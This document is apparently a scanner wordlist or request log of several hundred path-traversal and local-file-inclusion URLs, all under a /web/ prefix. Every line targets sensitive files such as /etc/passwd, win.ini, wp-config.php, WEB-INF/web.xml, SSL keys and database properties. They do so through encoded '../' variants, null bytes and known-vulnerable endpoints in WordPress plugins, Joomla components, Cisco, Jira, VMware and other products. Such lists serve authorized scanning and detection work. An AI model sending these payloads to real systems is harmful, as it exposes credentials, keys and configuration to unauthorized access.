/web/
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/%5C../ssl/yaws-key.pem
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/web/(download)/etc/passwd
/web/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/web/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/web/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5cetc/passwd
/web/..%5c..%5cetc/passwd
/web/..%5cetc/passwd
/web/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/web/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/web/..../..../..../..../..../..../..../..../..../windows/win.ini
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/../../../../../../../../../../../../../etc/passwd
/web/../../../../../../../../windows/win.ini
/web/../../../../../../etc/passwd
/web/../../../..//etc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/web/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/web/./../../../../../../../../../../etc/passwd
/web/./../../../../../../../../../../windows/win.ini
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web///../app.js
/web///////../../../etc/passwd
/web/?a=display&templateFile=README.md
/web/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/web/?c=../../../../../../etc/passwd%00
/web/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/web/?layout=/etc/passwd
/web/?mdocs-img-preview=../../../wp-config.php
/web/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/web/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/adm/file.cgi?next_file=%2fetc%2fpasswd
/web/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
/web/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/analytics/saw.dll?bieehome&startPage=1
/web/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/asd/../../../../../../../../etc/passwd
/web/assets/file:%2f%2f/etc/passwd
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/web/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/web/base/static/c:/windows/win.ini
/web/base_import/static/c:/windows/win.ini
/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/web/casmain.xgi
/web/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/web/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/web/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh
/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/web/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/web/cgi-bin/webproc
/web/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/web/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd
/web/comm.php?id=../../../../../../../../../../etc/passwd
/web/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/web/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/web/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini
/web/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/web/document.php?modulepart=project&file=../../../../../../../etc/passwd
/web/download.php?file=../../../../../etc/passwd
/web/druid/indexer/v1/sampler?for=connect
/web/eam/vib?id=/etc/issue
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/etc/passwd
/web/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/web/file=C:%5CWindows%5Cwin.ini
/web/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/web/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/web/fmangersub?cpath=../../../../../../../etc/passwd
/web/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/web/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/web/him/api/rest/V1.0/system/log/list?filePath=../
/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/web/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/web/images/..%2finfo.html
/web/img/../../../../../../etc/passwd
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/include/thumb.php?dir=http\\..\\..\\config\\config_db.php
/web/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/web/index.php?id=50&file=../../../../../../../../../etc/passwd
/web/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
/web/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/web/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/web/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/web/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/web/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/web/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/web/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
/web/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/web/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/web/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/web/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/web/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/web/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/web/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?sl=../../../../../../../etc/passwd%00
/web/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/web/interlib/report/ShowImage?localPath=etc/passwd
/web/jars/upload
/web/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd
/web/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/web/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/web/language/lang
/web/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/loginLess/../../etc/passwd
/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/maint/index.php?packages
/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/web/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english
/web/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/web/menu/neo
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/menu/stc
/web/msa/../../../../../../../../etc/passwd
/web/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd
/web/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF
/web/NCFindWeb?service=IPreAlertConfigService&filename=
/web/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml
/web/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/web/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
/web/pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/web/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/web/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei
/web/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/web/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/public/index.php/home/file/user_pics
/web/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php
/web/public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
/web/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd
/web/rapi/filedownload?filter=path:%2Fetc%2Fpasswd
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/rest/tinymce/1/macro/preview
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/s/24s7kEkARrESzYtdmvAjiL1Cqk2/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/s/24s7kF5SsnY8FYwgq6BqibLdf70/_/;/WEB-INF/web.xml
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/web/s/24s7kGAzCS0KwXpfrdTakkS6Nbm/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/web/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/..
/web/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
/web/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/web/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/secureader/javax.faces.resource/web.xml?loc=../WEB-INF
/web/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/web/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/web/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/web/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/web/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/src/redirect.php?plugins[]=../../../../etc/passwd%00
/web/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
/web/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5cetc/passwd
/web/static/..%5cetc/passwd
/web/static/../../../a/../../../../etc/passwd
/web/static///////../../../../etc/passwd
/web/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
/web/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
/web/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
/web/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/web/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/web/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://
/web/uir//etc/passwd
/web/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/ui_base/js/..%2f..%2f..%2f..%2fsettings.js
/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/viewlog.jsp
/web/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/web/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml
/web/web/static/c:/windows/win.ini
/web/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/web/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd
/web/webEdition/showTempFile.php?file=../../../../etc/passwd
/web/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd
/web/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152
/web/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/web/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
/web/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/web/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery
/web/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php
/web/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/web/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/web/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/web/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/web/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
/web/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/web/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/web/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/web/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/web/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/web/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/web/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/web/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/web/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/web/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/web/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/web/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/web/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/web/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/web/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/wp-content/plugins/wp-payeezy-pay/donate.php
/web/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/web/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
/web/wt3/forceSave.php?file=/etc/passwd
/web/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/web/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/web/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/web/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
/web/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1
